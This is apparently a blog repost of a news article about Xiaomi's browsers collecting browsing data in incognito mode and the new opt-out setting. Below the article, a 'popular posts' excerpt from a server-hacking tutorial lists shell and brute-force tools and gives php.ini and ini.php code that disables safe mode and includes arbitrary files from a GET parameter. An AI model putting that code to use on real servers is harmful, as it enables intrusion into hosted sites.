Skip to main content

How to prevent Xiaomi Phones from Spying On your Incognito Activities



If you own a Xiaomi smartphone or have installed the Mi browser app on any of your other brand Android device, you should enable a newly introduced privacy setting immediately to prevent the company from spying on your online activities.

The smartphone maker has begun rolling out an update to its Mi Browser/Mi Browser Pro (v12.1.4) and Mint Browser (v3.4.3) after concerns were raised over its practice of transmitting web browsing histories and device metadata to the company servers.

The new privacy setting now allows Mi Browser users to disable aggregated data collection feature while in Incognito Mode, but it bears noting that it's not enabled by default.

The option can be accessed by tapping the settings icon in the browser > Incognito mode settings > and then disable 'Enhanced incognito mode,' as shown in an attached screenshot below.

Mint Browser and Mi Browser Pro have been downloaded more than 15 million times from Google Play to date.


The development comes on the heels of a Forbes report last week that detailed how the company's browsers record users' website visits — even in incognito mode.

The browsers, which come pre-installed on millions of Xiaomi devices, capture search engine queries on Google and DuckDuckGo, and also amass data about what folders users open and to which screens they swipe, including the status bar and the settings menu.

xiaomi browser privacy settings

The aggregated data is then transferred to the servers located in China and Russia, counting servers the company rented from another Chinese tech giant Alibaba, ostensibly to better understand its users' behavior.

"My main concern for privacy is that the data sent to their servers can be very easily correlated with a specific user," Gabi Cirlig told Forbes.

Xiaomi browser history

In response to the report, Xiaomi claimed there were "several inaccuracies and misinterpretations about our process for browser data collection and storage," and that does not collect any data without permission from the user. It added all data is "aggregated and cannot alone be used to identify any individual."

Cybersecurity researcher Andrew Tierney, who investigated the data sniffing alongside Cirlig, refuted Xiaomi's response over the weekend, stating "they attach UUID to my requests which persists over at least 24 hours," and that "this is close enough to an 'individual.'"

To Opt-In or Opt-Out?


In pushing the update, the company doesn't seem to be stopping the practice altogether. In other words, unless users explicitly opt-out, Xiaomi will still continue to collect aggregate statistics while in incognito mode.

To be noted, the company still continually collects the same activity data when browsing in normal (non-incognito) mode, and there's no proper way to disable it.

"We believe this functionality, in combination with our approach of maintaining aggregated data in a non-identifiable form, goes beyond any legal requirements and demonstrates our company's commitment to user privacy," Xiaomi said in an update.

The fact that this data collection will remain enabled in the incognito mode is yet another example of a dark pattern that pushes for a privacy-intrusive default setting.

What's more, selecting the privacy-friendly choice takes at least three steps, proving once again that privacy comes at a cost, and it's always opt-out and never opt-in.

If Xiaomi was serious about its "commitment to user privacy," it would have sought users for their explicit consent. In its present state, it's just an illusion of control.
Source: The Hacker News 

Comments

Popular posts from this blog

10 Best Forum Software For Webmasters

10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h...

|Bypass Symlink on 2013 Server With Different .htaccess and Methods by Sen Haxor |

Hi, Guys,  Please a wonderfull tutorial provided bt Sem;\  Today I gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods. So let's Get Started :) Note: This method is not applicable for Godaddy, Bluehost, Hostgator and Hostmonstor Servers. For This First You Need the Following Files : 1 -> Sen Haxor CGI Shell 2 -> sen.zip 3 -> passwd-bypass.php 4 -> Turbo Brute force Cpanel 5 - > Port.py First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server . Use the Following Code : Make a php.ini with the following code safe_mode=Off And ini.php with <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo...

How to Hack WhatsApp using just a GIF

A picture is worth a thousand words, but a GIF is worth a thousand pictures. Today, the short looping clips, GIFs are everywhere—on your social media, on your message boards, on your chats, helping users perfectly express their emotions, making people laugh, and reliving a highlight. But what if an innocent-looking GIF greeting with Good morning, Happy Birthday, or Merry Christmas message hacks your smartphone? Well, not a theoretical idea anymore. WhatsApp has recently patched a critical security vulnerability in its app for Android, which remained unpatched for at least 3 months after being discovered, and if exploited, could have allowed remote hackers to compromise Android devices and potentially steal files and chat messages. WhatsApp Remote Code Execution Vulnerability The vulnerability, tracked as  CVE-2019-11932 , is a double-free memory corruption bug that doesn't actually reside in the WhatsApp code itself, but in an open-source GIF image parsing library that What...